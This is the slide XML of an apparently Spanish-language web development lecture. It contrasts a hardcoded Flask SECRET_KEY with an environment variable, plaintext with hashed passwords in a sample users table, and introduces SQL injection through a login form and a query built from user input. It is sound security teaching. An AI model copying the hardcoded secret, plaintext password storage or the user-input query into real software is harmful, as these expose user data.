                  <a:pt x="95325" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7098008" y="4665538"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="139377" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5163947" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="0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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7288431" y="3881286"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="3700232" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="314712" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254091" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206031" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165992" y="6480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15360" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="205857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="253503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6485" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205857" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253503" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313320" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759461" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807520" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847556" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013537" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007061" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807694" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760049" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370023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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7288431" y="3881286"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="313309" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3700232" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760043" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807686" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847572" y="6477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="314702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007066" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807512" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759455" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253499" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205856" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165970" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15353" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2065120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="253499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="205856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6477" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206030" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254086" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314702" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="0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6" name="Google Shape;306;p23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3247119" y="4234813"/>
            <a:ext cx="864300" cy="0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7" name="Google Shape;307;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4131600" y="3719550"/>
            <a:ext cx="29355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400">
                <a:solidFill>
                  <a:schemeClr val="dk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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Texto Cifrado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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400">
                <a:solidFill>
                  <a:schemeClr val="dk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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Llave Privada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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8" name="Google Shape;308;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="696794" y="4037400"/>
            <a:ext cx="26073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400">
                <a:solidFill>
                  <a:schemeClr val="dk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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Texto Plano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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Variables de Entorno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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="222300" y="796800"/>
            <a:ext cx="8699400" cy="3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app.config["SECRET_KEY"] = "dHdlbnR5ZWlnaHQ"</a:t>
            </a:r>
            <a:endParaRPr sz="20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"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="222300" y="796800"/>
            <a:ext cx="8699400" cy="3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app.config["SECRET_KEY"] = os.environ.get("SECRET_KEY")</a:t>
            </a:r>
            <a:endParaRPr sz="20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7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SQL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3" name="Google Shape;333;p28"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="365963" y="1229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{B6EE1970-63D4-491F-806F-041E0D5E9D7A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="666575"/>
                <a:gridCol w="3539450"/>
                <a:gridCol w="4206050"/>
              </a:tblGrid>
              <a:tr h="571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b="1" sz="16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26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FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>username</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="16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26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FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>password</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="16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2650"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="571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16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> anushree</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>hello</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> elle</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>password</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> rodrigo</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>12345</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> sebastian</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>abcdef</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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 sz="16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> jessica</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>qwerty</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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4" name="Google Shape;334;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209363" y="470300"/>
            <a:ext cx="47253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7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users</a:t>
            </a:r>
            <a:endParaRPr sz="27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9" name="Google Shape;339;p29"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="365963" y="1229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{B6EE1970-63D4-491F-806F-041E0D5E9D7A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="666575"/>
                <a:gridCol w="2265375"/>
                <a:gridCol w="5480125"/>
              </a:tblGrid>
              <a:tr h="571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FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="16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26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FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>username</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="16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26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FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>password</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="16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2650"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="571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16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> anushree</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> 48c8e8c3f9e80b68ac67304c7c510e9fcb</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> elle</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>6024aba15e3f9be95e3c9e6d3bf261d78e</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> rodrigo</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>90112701066c0a536f2f6b2761e5edb09e</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> sebastian</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>b053b7574c8a25751e2a896377e5d477c5</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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 sz="16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u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> jessica</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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 u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>a4048eaaee50680532845b2025996b44a9</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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0" name="Google Shape;340;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209363" y="470300"/>
            <a:ext cx="47253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7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users</a:t>
            </a:r>
            <a:endParaRPr sz="27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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454200" y="146850"/>
            <a:ext cx="8235600" cy="48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800">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Temas</a:t>
            </a:r>
            <a:endParaRPr sz="2800"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>
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Git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>
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML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>
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flask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>
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL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>
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>APIs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>
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript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>
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Django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s">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CI/CD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s">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escalabilidad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>
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>...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1112" y="0"/>
            <a:ext cx="65817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1112" y="0"/>
            <a:ext cx="65817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1112" y="0"/>
            <a:ext cx="65817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Inyección SQL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Google Shape;361;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="29779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[SQL Injection]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 txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454200" y="1216650"/>
            <a:ext cx="82356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700">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Username:</a:t>
            </a:r>
            <a:endParaRPr sz="27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700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>                                                           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="FFFFF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7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700">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password:</a:t>
            </a:r>
            <a:endParaRPr sz="27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700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>12345  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>                                                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:endParaRPr sz="2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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584700" y="1737000"/>
            <a:ext cx="79746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7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SELECT * FROM users</a:t>
            </a:r>
            <a:endParaRPr sz="27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7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	WHERE (username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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7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7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	AND (password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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27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/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454200" y="1216650"/>
            <a:ext cx="82356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700">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Username:</a:t>
            </a:r>
            <a:endParaRPr sz="27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700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>                                                           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="FFFFF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7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700">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password:</a:t>
            </a:r>
            <a:endParaRPr sz="27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700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> 12345</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>                                                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:endParaRPr sz="2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/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584700" y="1737000"/>
            <a:ext cx="79746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7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SELECT * FROM users</a:t>
            </a:r>
            <a:endParaRPr sz="27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7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	WHERE (username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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7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7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	AND (password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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27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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584700" y="1737000"/>
